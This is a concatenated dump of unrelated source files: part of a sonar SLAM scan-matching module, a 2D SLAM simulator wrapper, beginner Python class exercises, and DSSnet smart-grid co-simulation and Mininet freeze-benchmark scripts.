range_bound = translation_std * 5.0 + self.oculus.max_range
bearing_bound = rotation_std * 5.0 + self.oculus.horizontal_aperture * 0.5
local_points = Keyframe.transform_points(target_points, pose.inverse())
ranges = np.linalg.norm(local_points, axis=1)
bearings = np.arctan2(local_points[:, 1], local_points[:, 0])
sel_i = (ranges < range_bound) & (abs(bearings) < bearing_bound)
sel |= sel_i
target_points = target_points[sel]
target_keys = target_keys[sel]
target_frames, counts = np.unique(np.int32(target_keys), return_counts=True)
target_frames = target_frames[counts > 10]
counts = counts[counts > 10]
if len(target_frames) == 0 or len(target_points) < self.nssm_params.min_points:
ret.status = STATUS.NOT_ENOUGH_POINTS
ret.status.description = "target points {}".format(len(target_points))
return ret
ret.target_key = target_frames[np.argmax(counts)]
ret.target_pose = self.keyframes[ret.target_key].pose
ret.target_points = Keyframe.transform_points(
target_points, ret.target_pose.inverse()
)
ret.cov = self.keyframes[ret.source_key].cov
if not self.nssm_params.initialization:
return ret
with CodeTimer("SLAM - nonsequential scan matching - sampling"):
translation_std = np.sqrt(np.max(np.linalg.eigvals(cov[:2, :2])))
rotation_std = np.sqrt(cov[2, 2])
pose_stds = np.array([[translation_std, translation_std, rotation_std]]).T
pose_bounds = 5.0 * np.c_[-pose_stds, pose_stds]
# ret.occ = self.get_map(target_frames)
# subroutine, pose_samples = self.get_matching_cost_subroutine2(
# ret.source_points,
# ret.source_pose,
# ret.occ,
# )
subroutine, pose_samples = self.get_matching_cost_subroutine1(
ret.source_points,
ret.source_pose,
ret.target_points,
ret.target_pose,
ret.cov,
)
result = shgo(
func=subroutine,
bounds=pose_bounds,
n=self.nssm_params.initialization_params[0],
iters=self.nssm_params.initialization_params[1],
sampling_method="sobol",
minimizer_kwargs={
"options": {"ftol": self.nssm_params.initialization_params[2]}
},
)
if not result.success:
ret.status = STATUS.INITIALIZATION_FAILURE
ret.status.description = result.message
return ret
delta = n2g(result.x, "Pose2")
ret.estimated_source_pose = ret.source_pose.compose(delta)
ret.source_pose_samples = np.array(pose_samples)
ret.status.description = "matching cost {:.2f}".format(result.fun)
# Refine target key by searching for the pose with maximum overlap
# with current source points
estimated_source_points = Keyframe.transform_points(
ret.source_points, ret.estimated_source_pose
)
overlap, indices = self.get_overlap(
estimated_source_points, target_points, return_indices=True
)
target_frames1, counts1 = np.unique(
np.int32(target_keys[indices[indices != -1]]), return_counts=True
)
if len(counts1) == 0:
ret.status = STATUS.NOT_ENOUGH_OVERLAP
ret.status.description = "0"
return ret
if self.save_data:
ret.save("step-{}-nssm-sampling.npz".format(self.current_key - 1))
ret.target_key = target_frames1[np.argmax(counts1)]
ret.target_pose = self.keyframes[ret.target_key].pose
# Recalculate target points with new target key in target frame
ret.target_points = self.get_points(target_frames, ret.target_key)
return ret
def add_nonsequential_scan_matching(self):
"""
Add non-sequential scan matching factor.
kf[m - k1] -- ... -- kf[m] -- ... -- kf[m + k2] -- ... -- kf[t - p] -- ... -- kf[t]
|____ _____|________|________________| |_______________|
target points around kf[m] source points
"""
if self.current_key < self.nssm_params.min_st_sep:
return
ret = self.initialize_nonsequential_scan_matching()
if self.save_fig:
ret.plot("step-{}-nssm-sampling.png".format(self.current_key - 1))
if not ret.status:
return
ret2 = ICPResult(ret, self.nssm_params.cov_samples > 0)
# sample_deltas = np.random.uniform(-1, 1, (self.nssm_params.cov_samples, 3))
# sample_deltas[:, 0] *= self.icp_odom_sigmas[0] * 10
# sample_deltas[:, 1] *= self.icp_odom_sigmas[1] * 10
# sample_deltas[:, 2] *= self.icp_odom_sigmas[2] * 10
# ret2.initial_transforms = [
# ret2.initial_transform.compose(n2g(sample_delta, "Pose2"))
# for sample_delta in sample_deltas
# ]
# Compute ICP here with a timer
with CodeTimer("SLAM - nonsequential scan matching - ICP"):
if self.nssm_params.initialization and self.nssm_params.cov_samples > 0:
message, odom, cov, sample_transforms = self.compute_icp_with_cov(
ret2.source_points,
ret2.target_points,
ret2.initial_transforms[: self.nssm_params.cov_samples],
)
if message != "success":
ret2.status = STATUS.NOT_CONVERGED
ret2.status.description = message
else:
ret2.estimated_transform = odom
ret2.cov = cov
ret2.sample_transforms = sample_transforms
ret2.status.description = "{} samples".format(
len(ret2.sample_transforms)
)
else:
message, odom = self.compute_icp(
ret2.source_points, ret2.target_points, ret2.initial_transform
)
if message != "success":
ret2.status = STATUS.NOT_CONVERGED
ret2.status.description = message
else:
ret2.estimated_transform = odom
                    ret2.status.description = ""
# Add some failure detections
# The transformation compared to initial guess can't be too large
if ret2.status:
delta = ret2.initial_transform.between(ret2.estimated_transform)
delta_translation = delta.translation().norm()
delta_rotation = abs(delta.theta())
if (
delta_translation > self.nssm_params.max_translation
or delta_rotation > self.nssm_params.max_rotation
):
ret2.status = STATUS.LARGE_TRANSFORMATION
ret2.status.description = "trans {:.2f} rot {:.2f}".format(
delta_translation, delta_rotation
)
# There must be enough overlap between two point clouds.
if ret2.status:
overlap = self.get_overlap(
ret2.source_points, ret2.target_points[:, :2], ret2.estimated_transform
)
if overlap < self.nssm_params.min_points:
ret2.status = STATUS.NOT_ENOUGH_OVERLAP
ret2.status.description = str(overlap)
if ret2.status:
if self.save_data:
ret2.save("step-{}-nssm-icp.npz".format(self.current_key - 1))
# # DCS
# if ret2.cov is not None:
# icp_odom_model = self.create_robust_full_noise_model(ret2.cov)
# else:
# icp_odom_model = self.create_robust_noise_model(self.icp_odom_sigmas)
# factor = gtsam.BetweenFactorPose2(
# X(ret2.target_key),
# X(ret2.source_key),
# ret2.estimated_transform,
# icp_odom_model,
# )
# self.graph.add(factor)
# self.keyframes[ret2.source_key].constraints.append(
# (ret2.target_key, ret2.estimated_transform)
# )
# ret2.inserted = True
while (
self.nssm_queue
and ret2.source_key - self.nssm_queue[0].source_key
> self.pcm_queue_size
):
self.nssm_queue.pop(0)
self.nssm_queue.append(ret2)
pcm = self.verify_pcm(self.nssm_queue)
for m in pcm:
ret2 = self.nssm_queue[m]
if not ret2.inserted:
if ret2.cov is not None:
icp_odom_model = self.create_full_noise_model(ret2.cov)
else:
icp_odom_model = self.icp_odom_model
factor = gtsam.BetweenFactorPose2(
X(ret2.target_key),
X(ret2.source_key),
ret2.estimated_transform,
icp_odom_model,
)
self.graph.add(factor)
self.keyframes[ret2.source_key].constraints.append(
(ret2.target_key, ret2.estimated_transform)
)
ret2.inserted = True
if self.save_fig:
ret2.plot("step-{}-nssm-icp.png".format(self.current_key - 1))
return ret2
def is_keyframe(self, frame):
if not self.keyframes:
return True
duration = frame.time - self.current_keyframe.time
if duration < self.keyframe_duration:
return False
dr_odom = self.keyframes[-1].dr_pose.between(frame.dr_pose)
translation = dr_odom.translation().norm()
rotation = abs(dr_odom.theta())
return (
translation > self.keyframe_translation or rotation > self.keyframe_rotation
)
def create_full_noise_model(self, cov):
return gtsam.noiseModel_Gaussian.Covariance(cov)
def create_robust_full_noise_model(self, cov):
model = gtsam.noiseModel_Gaussian.Covariance(cov)
robust = gtsam.noiseModel_mEstimator_DCS.Create(1.0)
return gtsam.noiseModel_Robust.Create(robust, model)
def create_noise_model(self, *sigmas):
return gtsam.noiseModel_Diagonal.Sigmas(np.r_[sigmas])
def create_robust_noise_model(self, *sigmas):
model = gtsam.noiseModel_Diagonal.Sigmas(np.r_[sigmas])
robust = gtsam.noiseModel_mEstimator_DCS.Create(1.0)
return gtsam.noiseModel_Robust.Create(robust, model)
def update_factor_graph(self, keyframe=None):
if keyframe:
self.keyframes.append(keyframe)
self.isam.update(self.graph, self.values)
self.graph.resize(0)
self.values.clear()
# Update all trajectory
values = self.isam.calculateEstimate()
for x in range(values.size()):
pose = values.atPose2(X(x))
self.keyframes[x].update(pose)
# Only update latest cov
cov = self.isam.marginalCovariance(X(values.size() - 1))
self.keyframes[-1].update(pose, cov)
for ret in self.nssm_queue:
ret.source_pose = self.keyframes[ret.source_key].pose
ret.target_pose = self.keyframes[ret.target_key].pose
if ret.inserted:
ret.estimated_transform = ret.target_pose.between(ret.source_pose)
def verify_pcm(self, queue):
"""
Get the pairwise consistent measurements.
Consistency of two measurements Tz_{il}, Tz_{jk} is defined as
Tz_{jk}^{-1} x (T_{j} x T_{ij}^{-1} x Tz_{il} T_{lk}), l < k
nssm_{il} nssm_{jk}
------- -------
| | | |
| i <-|-------------|-- j |
| | | | | |
| v | | v |
| l --|-------------|-> k |
------- -------
"""
if len(queue) < self.min_pcm:
return []
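        # Build a consistency graph over the queued loop closures: an edge connects two
        # closures whose composed relative-pose discrepancy has Mahalanobis distance
        # below the chi-square threshold, and the largest maximal clique is returned
        # as the pairwise-consistent set.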
G = defaultdict(list)
for (a, ret_il), (b, ret_jk) in combinations(zip(range(len(queue)), queue), 2):
pi = ret_il.target_pose
pj = ret_jk.target_pose
pil = ret_il.estimated_transform
plk = ret_il.source_pose.between(ret_jk.source_pose)
pjk1 = ret_jk.estimated_transform
pjk2 = pj.between(pi.compose(pil).compose(plk))
error = gtsam.Pose2.Logmap(pjk1.between(pjk2))
md = error.dot(np.linalg.inv(ret_jk.cov)).dot(error)
# chi2.ppf(0.99, 3) = 11.34
if md < 11.34:
G[a].append(b)
G[b].append(a)
maximal_cliques = list(self.find_cliques(G))
if not maximal_cliques:
return []
maximum_clique = sorted(maximal_cliques, key=len, reverse=True)[0]
if len(maximum_clique) < self.min_pcm:
return []
return maximum_clique
def find_cliques(self, G):
"""Returns all maximal cliques in an undirected graph.
"""
if len(G) == 0:
return
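        # This appears to follow the iterative Bron-Kerbosch algorithm with pivoting
        # (in the style of networkx.find_cliques), yielding each maximal clique as a
        # list of node keys of G.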
adj = {u: {v for v in G[u] if v != u} for u in G}
Q = [None]
subg = set(G)
cand = set(G)
u = max(subg, key=lambda u: len(cand & adj[u]))
ext_u = cand - adj[u]
stack = []
try:
while True:
if ext_u:
q = ext_u.pop()
cand.remove(q)
Q[-1] = q
adj_q = adj[q]
subg_q = subg & adj_q
if not subg_q:
yield Q[:]
else:
cand_q = cand & adj_q
if cand_q:
stack.append((subg, cand, ext_u))
Q.append(None)
subg = subg_q
cand = cand_q
u = max(subg, key=lambda u: len(cand & adj[u]))
ext_u = cand - adj[u]
else:
Q.pop()
subg, cand, ext_u = stack.pop()
except IndexError:
pass
``` |
{
"source": "jinkunw/em_exploration",
"score": 3
} |
#### File: em_exploration/scripts/pyss2d.py
```python
import math
from ConfigParser import SafeConfigParser
import numpy as np
from scipy.stats.distributions import chi2
import ss2d
from utils import *
def read_sensor_params(config):
sensor_params = ss2d.BearingRangeSensorModelParameter()
sensor_params.bearing_noise = math.radians(config.getfloat('Sensor Model', 'bearing_noise'))
# sensor_params.range_noise = math.radians(config.getfloat('Sensor Model', 'range_noise'))
sensor_params.range_noise = config.getfloat('Sensor Model', 'range_noise')
sensor_params.min_bearing = math.radians(config.getfloat('Sensor Model', 'min_bearing'))
sensor_params.max_bearing = math.radians(config.getfloat('Sensor Model', 'max_bearing'))
sensor_params.min_range = config.getfloat('Sensor Model', 'min_range')
sensor_params.max_range = config.getfloat('Sensor Model', 'max_range')
return sensor_params
def read_control_params(config):
control_params = ss2d.SimpleControlModelParameter()
control_params.rotation_noise = math.radians(config.getfloat('Control Model', 'rotation_noise'))
control_params.translation_noise = config.getfloat('Control Model', 'translation_noise')
return control_params
def read_environment_params(config):
environment_params = ss2d.EnvironmentParameter()
environment_params.min_x = config.getfloat('Environment', 'min_x')
environment_params.max_x = config.getfloat('Environment', 'max_x')
environment_params.min_y = config.getfloat('Environment', 'min_y')
environment_params.max_y = config.getfloat('Environment', 'max_y')
environment_params.safe_distance = config.getfloat('Environment', 'safe_distance')
return environment_params
def read_virtual_map_params(config, map_params):
virtual_map_params = ss2d.VirtualMapParameter(map_params)
virtual_map_params.resolution = config.getfloat('Virtual Map', 'resolution')
virtual_map_params.sigma0 = config.getfloat('Virtual Map', 'sigma0')
virtual_map_params.num_samples = config.getint('Virtual Map', 'num_samples')
return virtual_map_params
def read_map_params(config, ext=5.0):
map_params = ss2d.EnvironmentParameter()
map_params.min_x = config.getfloat('Environment', 'min_x') - ext
map_params.max_x = config.getfloat('Environment', 'max_x') + ext
map_params.min_y = config.getfloat('Environment', 'min_y') - ext
map_params.max_y = config.getfloat('Environment', 'max_y') + ext
map_params.safe_distance = config.getfloat('Environment', 'safe_distance')
return map_params
class SS2D(object):
def __init__(self, config, verbose=False):
if isinstance(config, str):
self._config = load_config(config)
elif isinstance(config, SafeConfigParser):
self._config = config
else:
print('Config type not supported!')
self._sensor_params = read_sensor_params(self._config)
self._control_params = read_control_params(self._config)
self._environment_params = read_environment_params(self._config)
self._map_params = read_map_params(self._config)
self._virtual_map_params = read_virtual_map_params(self._config, self._map_params)
x0 = self._config.getfloat('Simulator', 'x0')
y0 = self._config.getfloat('Simulator', 'y0')
theta0 = math.radians(self._config.getfloat('Simulator', 'theta0'))
sigma_x0 = self._config.getfloat('Simulator', 'sigma_x0')
sigma_y0 = self._config.getfloat('Simulator', 'sigma_y0')
sigma_theta0 = math.radians(self._config.getfloat('Simulator', 'sigma_theta0'))
num_random_landmarks = self._config.getint('Simulator', 'num')
seed = self._config.getint('Simulator', 'seed')
if seed < 0:
seed = int(time() * 1e6)
self._sim = ss2d.Simulator2D(self._sensor_params, self._control_params, seed)
self._sim.initialize_vehicle(ss2d.Pose2(x0, y0, theta0))
self._slam = ss2d.SLAM2D(self._map_params)
self._virtual_map = ss2d.VirtualMap(self._virtual_map_params, seed)
if self._config.has_section('Landmarks') and self._config.has_option('Landmarks', 'x') and \
self._config.has_option('Landmarks', 'y'):
x = eval(self._config.get('Landmarks', 'x'))
y = eval(self._config.get('Landmarks', 'y'))
landmarks = []
for xi, yi in zip(x, y):
landmarks.append(ss2d.Point2(xi, yi))
self._sim.random_landmarks(landmarks, num_random_landmarks, self._environment_params)
else:
self._sim.random_landmarks([], num_random_landmarks, self._environment_params)
self.verbose = verbose
if self.verbose:
self._sim.pprint()
self._virtual_map_params.pprint()
self._slam.pprint()
initial_state = ss2d.VehicleBeliefState(self._sim.vehicle,
np.diag([1.0 / sigma_x0 ** 2, 1.0 / sigma_y0 ** 2,
1.0 / sigma_theta0 ** 2]))
self.step = 0
self._cleared = True
self._da_ground_truth = {}
self._slam.add_prior(initial_state)
self.measure()
self.optimize()
self.step += 1
def move(self, odom):
odom = ss2d.Pose2(odom[0], odom[1], odom[2])
_, self._control_state = self._sim.move(odom, True)
self._slam.add_odometry(self._control_state)
def measure(self):
self._measurements = self._sim.measure()
for key, m in self._measurements:
self._slam.add_measurement(key, m)
return
def optimize(self):
self._slam.optimize(update_covariance=True)
def update_virtual_map(self, update_probability=False, update_information=True):
if update_probability:
self._virtual_map.update_probability(self._slam, self._sim.sensor_model)
if update_information:
self._virtual_map.update_information(self._slam.map, self._sim.sensor_model)
def simulate(self, odom, core=True):
self.move(odom)
obstacle = False
###############################
measurements = self._sim.measure()
landmarks = [key for key, landmark in self._slam.map.iter_landmarks()]
for key, m in measurements:
if self._cleared:
if m.range < self._environment_params.safe_distance:
obstacle = True
self._cleared = False
break
else:
if key not in landmarks and m.range < self._environment_params.safe_distance:
obstacle = True
self._cleared = False
break
if not obstacle and core:
self._cleared = True
###############################
if not core and not obstacle:
return obstacle
self.step += 1
self.measure()
self.optimize()
self.update_virtual_map(True, True)
return obstacle
def simulate_simple(self, odom):
self.move(odom)
self.measure()
self.optimize()
self.update_virtual_map(True, True)
self.step += 1
@property
def distance(self):
return self._slam.map.distance
@property
def vehicle_position(self):
return self._slam.map.get_current_vehicle().pose
@property
def map(self):
return self._slam.map
@property
def environment(self):
return self._sim.environment
def plot(self, autoscale=False):
plot_environment(self._sim.environment, label=False)
plot_pose(self._sim.vehicle, self._sensor_params)
plot_measurements(self._sim.vehicle, self._measurements, label=False)
plot_map(self._slam.map, label=True)
if autoscale:
plt.gca().autoscale()
xlim = plt.gca().get_xlim()
ylim = plt.gca().get_ylim()
plot_virtual_map(self._virtual_map, self._map_params)
if autoscale:
plt.gca().set_xlim(xlim)
plt.gca().set_ylim(ylim)
# plot_samples(self._virtual_map)
def savefig(self, figname=None):
plot_environment(self._sim.environment, label=False)
plot_pose(self._sim.vehicle, self._sensor_params)
plot_measurements(self._sim.vehicle, self._measurements, label=False)
plot_map(self._slam.map, label=True)
plot_virtual_map(self._virtual_map, self._map_params)
# plot_samples(self._virtual_map)
if figname is None:
figname = 'step{}.png'.format(self.step)
        plt.savefig(figname, dpi=200, bbox_inches='tight')
plt.close()
if __name__ == '__main__':
import sys
ss = SS2D(sys.path[0] + '/pyss2d.ini')
ss.savefig()
for step in range(120):
if step == 10 or step == 20 or step == 40 or step == 60 or step == 80 or step == 100:
odom = 0, 0, math.pi / 2.0
else:
odom = 1, 0, 0
ss.simulate_simple(odom)
ss.savefig()
``` |
{
"source": "jinkyukim-me/StudyPython",
"score": 3
} |
#### File: StudyPython/exercises/ex43_classes.py
```python
print("""
* Map
- next_scene
- opening_scene
* Engine
- play
* Scene
- enter
* Death
* Central Corridor
* Laser Weapon Armory
* The Bridge
* Escape Pod
""")
class Scene(object):
def enter(self):
pass
class Engine(object):
def __init__(self, scene_map):
pass
def play(self):
pass
class Death(Scene):
def enter(self):
pass
class CentralCorridor(Scene):
def enter(self):
pass
class LaserWeaponArmory(Scene):
def enter(self):
pass
class TheBridge(Scene):
def enter(self):
pass
class EscapePod(Scene):
def enter(self):
pass
class Map(object):
def __init__(self, start_scene):
pass
def next_scene(self, scene_name):
pass
def opening_scene(self):
pass
a_map = Map('central_corridor')
a_game = Engine(a_map)
a_game.play()
```
#### File: StudyPython/exercises/ex44d.py
```python
class Parent(object):
    """A simple example class""" # docstring at the start of the class definition
    def __init__(self): # constructor
        self.name = "Kim"
    def override(self): # override() method
        print("PARENT override()")
    def implicit(self): # implicit() method
        print("PARENT implicit()")
    def altered(self): # altered() method
        print("PARENT altered()")
class Child(Parent):
    def __init__(self): # child class constructor
        super().__init__() # call the parent class constructor
        self.blood = "O" # add a blood attribute
    def override(self):
        print("CHILD override()") # override() method
    def altered(self): # altered() method
        print("CHILD, BEFORE PARENT altered()")
        super(Child, self).altered() # call the parent class method via super(ChildClass, self)
        print("CHILD, AFTER PARENT altered()")
dad = Parent() # create an instance of the class
son = Child() # create an instance of the class
dad.implicit()
son.implicit()
dad.override()
son.override()
dad.altered()
son.altered()
```
#### File: jinkyukim-me/StudyPython/type_3_arg.py
```python
class Tea(Base1, Base2):
party = 'Elice'
def Coding(self):
return 'Build Projects'
# Python essentially does this
def Coding(self):
return 'Build Projects'
body = {'party':'Elice', 'Coding': Coding}
Tea = type('Tea', (Base1, Base2), body)
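# Note: Base1 and Base2 are assumed to be defined elsewhere; type(name, bases, dict)
# builds the same class object that the `class Tea(Base1, Base2): ...` statement above would.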
``` |
{
"source": "JinLabIIT/DSSnet",
"score": 3
} |
#### File: benchmarks/old/iperftest.py
```python
import subprocess
PIDQ = "sudo pgrep -f mininet: > pidlist"
p=''
def pidList():
global p
list = subprocess.call(PIDQ,shell=True)
with open('pidlist', 'r') as ins:
for line in ins:
p+= ('%s%s' %(' -',line.rstrip('\n')))
print (p)
pidList()
PAUSE = 'sudo kill --signal SIGSTOP%s'%p
RESUME ='sudo kill --signal SIGCONT%s'%p
def Ptest():
process = subprocess.call(PAUSE, shell=True)
def Rtest():
process = subprocess.call(RESUME, shell=True)
```
#### File: scale/orig/avgPlotAll.py
```python
import sys
import matplotlib.pyplot as plt
import numpy as np
import six
import matplotlib.colors as colors
import matplotlib
import math
def plot_all(output_file):
plt.figure()
avg = []
std = []
conf_int = []
scales = [10, 50, 100, 250, 500]
for scale in scales:
freezeData = np.loadtxt("freeze_%s.txt" % scale)
unfreezeData = np.loadtxt("unfreeze_%s.txt" % scale)
size = len(freezeData)
freezeData *= 1000 # to milliseconds
unfreezeData *= 1000
sync = np.add(freezeData, unfreezeData)
avg.append(np.average(sync))
std.append(np.std(sync))
conf_int.append(np.std(sync) * 1.96 / math.sqrt(size))
matplotlib.rc('font', size=15)
plt.plot(scales, avg, color='blue', linewidth=2.0, label='Emulation Overhead')
plt.bar(scales, avg, width=35, color='white', yerr=std, ecolor='red', hatch='/')
plt.grid(True)
plt.xticks([10,50,100,150,200,250,300,350,400,450,500,550], horizontalalignment='left')
plt.xlabel('Number of Hosts', fontsize=20)
plt.ylabel('Average Overhead (Milliseconds)', fontsize=20)
plt.legend(loc='upper left')
plt.savefig(output_file, format='eps')
plt.show()
if __name__ == '__main__':
ls_name = ['solid', 'dashed', 'dashdot', 'dotted', '-', '--', '-.', ':']
colors_name = ['red', 'blue', 'cyan', 'peru', 'green', 'salmon', 'pink', 'lime', 'tan', 'seagreen', 'purple', 'wheat']
    print(colors_name)
output = 'ScaleFrzAvg.eps'
plot_all(output)
```
#### File: scale/orig/benchmark_pause.py
```python
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.node import CPULimitedHost, Controller, OVSKernelSwitch, RemoteController, Host
from mininet.cli import CLI
from mininet.link import TCLink
from mininet.util import irange, dumpNodeConnections
from mininet.log import setLogLevel, info
import sys
import time
import os
import subprocess
import logging
log = str(sys.argv[2])
logging.basicConfig(filename=log,level=logging.DEBUG)
num_hosts = int(sys.argv[1])
pIDS = ''
def pidList(net):
global pIDS
for host in net.hosts :
pIDS += ' %s' % host.pid
for s in net.switches :
pIDS+= ' %s' % s.pid
for c in net.controllers:
pIDS += ' %s' %c.pid
#print ('pids subject to pause: %s'%pIDS)
NPAUSE = ''
NRESUME = ''
def setupPause():
global pIDS, NPAUSE, NRESUME
NPAUSE = 'sudo /home/kd/VirtualTimeKernel/test_virtual_time/freeze_all_procs -f -p %s'%pIDS
NRESUME = 'sudo /home/kd/VirtualTimeKernel/test_virtual_time/freeze_all_procs -u -p %s'%pIDS
def pause ():
before_time = time.time()
process = subprocess.call(NPAUSE,shell=True)
after_time = time.time()
logging.info('pause,%s'% (after_time-before_time))
def resume ():
before_time = time.time()
process = subprocess.call(NRESUME,shell=True)
after_time = time.time()
logging.info('resume,%s'% (after_time-before_time))
NPAUSE = ''
NRESUME = ''
class DssTopo(Topo):
"DSS custom topo"
def build(self, topoConfig='default.config'):
global num_hosts
for i in range(num_hosts):
host=self.addHost('H%s'%i)
def test(num):
for i in range(0, num):
time.sleep(0.1)
pause()
time.sleep(0.1)
resume()
def start():
topo = DssTopo()
net = Mininet(topo, link = TCLink)
net.start()
pidList(net)
setupPause()
#call loop
test(1000)
start()
```
#### File: tests/vtime/A.py
```python
import signal,os
import sys
import time
import gtod
def setup_pipe():
pipe_name = '/tmp/vtime_test.pipe'
if not os.path.exists(pipe_name):
os.mkfifo(pipe_name)
pipeout = os.open(pipe_name, os.O_WRONLY)
return pipeout
def send(msg,pipe):
msg_n = '%s\n'%msg
try:
os.write(pipe, msg_n.encode('utf-8'))
except BrokenPipeError:
# exit quietly..
exit()
if __name__ == '__main__':
my_pipe = setup_pipe()
while 1:
send(str(gtod.time()),my_pipe)
time.sleep(2)
```
#### File: net/DSSnet/DSSnet_events.py
```python
class Events:
'class for storing events in heap'
e_id = 0
def __init__(self, msg, time):
self.msg = msg
self.time = time
Events.e_id +=1
def __lt__(self,other):
val = self.time
otherval = other.time
return val < otherval
def get_event(self):
return self.msg
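# Example (hypothetical usage): __lt__ lets a min-heap order events by time
#   import heapq
#   heap = []
#   heapq.heappush(heap, Events('open breaker', 2.5))
#   heapq.heappush(heap, Events('read meter', 1.0))
#   heapq.heappop(heap).get_event()   # -> 'read meter'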
```
#### File: net/DSSnet/DSSnet_hosts.py
```python
class DSSnet_hosts:
'class for meta process/IED info'
p_id = 0
def __init__(self, msg, IED_id, command, ip, pipe = True):
self.properties= msg
self.IED_id = IED_id
self.process_id= DSSnet_hosts.p_id
self.command = command
self.ip = ip
self.pipe = pipe
DSSnet_hosts.p_id +=1
def number_processes(self):
return DSSnet_hosts.p_id
def get_host_name(self):
return self.IED_id
def get_ip(self):
return self.ip
def get_process_command(self):
return self.command
def display_process(self):
return('%s : %s : %s \n' % (self.process_id , self.IED_id, self.properties))
```
#### File: DSSnet/models/gen_normal.py
```python
# get value from opendss
# send value of load to control center
import pipe
import sys
import time
import threading
import zmq
import os
import logging
import gtod
TIME_INT = 0.1
Gen_ID = sys.argv[1]
server_IP = sys.argv[2]
server_Port = sys.argv[3]
#initialize values
gen_val1 = 250.0
gen_val2 = 250.0
gen_val3 = 250.0
load_1_val = 250.0
load_2_val = 250.0
load_3_val = 250.0
load_4_val = 250.0
'''
# listen for messages from the generator
# if new generator message
# update gen_val to new value
# listen for messages from loads, 1 - 4
# if new load message x
# update load_x_val to new value
# every 100 ms
# run function
# difference = gen - total load
# if difference is positive
# send message to energy storage to charge the difference
# else difference is negitive
# send message to energy storage to discharge battery
'''
logging.basicConfig(filename='%s.log'%Gen_ID,level=logging.DEBUG)
contextOut = zmq.Context()
clientOut = contextOut.socket(zmq.REQ)
clientOut.connect("tcp://%s:%s" % (server_IP,server_Port))
print('talking on %s:%s'%(server_IP,server_Port))
# open pipe to communicate to opendss
pipeout=pipe.setup_pipe_l(Gen_ID)
pipin = pipe.setup_pipe_w()
# send to control center
def send_cc(val):
global gen_val1
global gen_val2
global gen_val3
gens = val.split()
gen_val1 = float(gens[0])
gen_val2 = float(gens[1])
gen_val3 = float(gens[2])
dif1 = gen_val1 + 1292.0
dif2 = gen_val2 + 1039.0#(573 + load_1_val + load_2_val/2)
dif3 = gen_val3 + 1252.0#(880 + load_3_val + load_2_val/2)
print('difs')
print(dif1)
print(dif2)
print(dif3)
send_es('%s %s %s %s '% (dif1, dif2, dif3, time.time()))
def send_es(vall):
val = vall.encode('utf-8')
clientOut.send(val)
    print('sent but waiting for response')
status=clientOut.recv()
logging.debug('sent message to cc: %s '%val)
    print('sent')
def get_val():
update = 'update b p pre_gen_report post_gen_report %s %s 1 mon_wind_gen\n' %(time.time(),Gen_ID)
pipe.send_sync_event(update.encode('UTF-8'), pipin)
def t():
print(time.time())
time.sleep(2)# for sync to start properly
if os.fork():
while 1:
#listen to response and send to cc
x = pipe.listen(pipeout)
if x:
            print(x)
send_cc(x)
time.sleep(0.001)
while 1:
time.sleep(TIME_INT)
get_val()
```
#### File: DSSnet/models/gtod.py
```python
import sys
from ctypes import *
libgtod = cdll.LoadLibrary('./models/libgtod.so')
def time():
#c_longdouble
gt = libgtod.gt
gt.restype = c_longdouble
t=gt()
#print ('%0.6f'%t)
#print str('%0.6f'%t)
#print ('%0.6f' %float(str('%0.6f'%t)))
return float(str('%0.6f'%t))
```
#### File: DSSnet/models/h2.py
```python
# get value from opendss
# send value of load to control center
import pipe
import sys
import time
import threading
import zmq
import os
import logging
TIME_INT = 0.1
Gen_ID = sys.argv[1]
server_IP = sys.argv[2]
server_Port = sys.argv[3]
contextOut = zmq.Context()
clientOut = contextOut.socket(zmq.REQ)
clientOut.connect("tcp://%s:%s" % (server_IP,server_Port))
# open pipe to communicate to opendss
pipeout=pipe.setup_pipe_l(Gen_ID)
#pipin = pipe.setup_pipe_w()
logging.basicConfig(filename='%s.log'%Gen_ID)
#print 'starting\n'
# send to control center
def send_es():
val = 'ok'.encode('utf-8')
start_time = time.time()
clientOut.send(val)
status=clientOut.recv()
logging.debug('%s' % str(time.time() - start_time))
    print('%s' % (str(time.time() - start_time)))
while 1:
time.sleep(TIME_INT)
send_es()
```
#### File: DSSnet/models/pmu.py
```python
import pipe
import time
import sys
import threading
pipout = pipe.setup_pipe_l(sys.argv[1])
pipin = pipe.setup_pipe_w()
from ctypes import *
#from numpy import array
libpmu=cdll.LoadLibrary('./models/libpmu.so')
class PMU:
def __init__(self, idcode, message_time_quality,
stn, data_format, phnmr,
annmr, dgnmr, chnam, phunit, anunit, digunit,
fnom, cfgcnt, data_rate, time_base, pdc_IP, pdc_port):
self.idcode = idcode
self.message_time_quality = message_time_quality
self.time_base = time_base
self.stn = stn
self.data_format = data_format
self.phnmr = phnmr
self.annmr = annmr
self.dgnmr = dgnmr
self.chnam = chnam
self.phunit = phunit
self.anunit = anunit
self.digunit = digunit
self.fnom = fnom
self.cfgcnt = cfgcnt
self.data_rate = data_rate
self.pdc_IP = pdc_IP
self.pdc_port = pdc_port
def prnt(p):
print (p.idcode)
print (p.message_time_quality)
print (p.time_base)
print (p.stn)
print (p.data_format)
print (p.phnmr)
print (p.annmr)
print (p.dgnmr)
print (p.chnam)
print (p.phunit)
print (p.anunit)
print (p.digunit)
print (p.fnom)
print (p.cfgcnt)
print (p.data_rate)
print (p.pdc_IP)
print (p.pdc_port)
def _cfg2(pmu):
#//print('hi0\n\n')
libpmu.cfg2_python(c_int(pmu.pdc_port),
c_int(pmu.idcode),
c_int(pmu.message_time_quality),
c_int(pmu.data_format),
c_char_p(pmu.stn),
c_int(pmu.phnmr),
c_int(pmu.annmr),
c_int(pmu.dgnmr),
(c_char_p(pmu.chnam)),
(pmu.phunit),
(pmu.anunit),
(pmu.digunit),
c_int(pmu.fnom),
c_int(pmu.cfgcnt),
c_int(pmu.data_rate),
c_int(pmu.time_base),
c_char_p(pmu.pdc_IP)
)
def _data(pmu, phasor_data, analog_data, digital_data, freq_data, dfreq_data):
libpmu.data_python(c_int(pmu.pdc_port),
c_int(pmu.idcode),
c_int(pmu.message_time_quality),
c_int(pmu.data_format),
c_char_p(pmu.stn),
c_int(pmu.phnmr),
c_int(pmu.annmr),
c_int(pmu.dgnmr),
(c_char_p(pmu.chnam)),
(pmu.phunit),
(pmu.anunit),
(pmu.digunit),
c_int(pmu.fnom),
c_int(pmu.cfgcnt),
c_int(pmu.data_rate),
c_int(pmu.time_base),
c_char_p(pmu.pdc_IP),
phasor_data,
analog_data,
digital_data,
freq_data,
dfreq_data
)
def read_pmu(filename):
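    # Assumed config format (hypothetical example): one comma-separated key,value line
    # per parameter, e.g.
    #   idcode,7
    #   stn,STATION A
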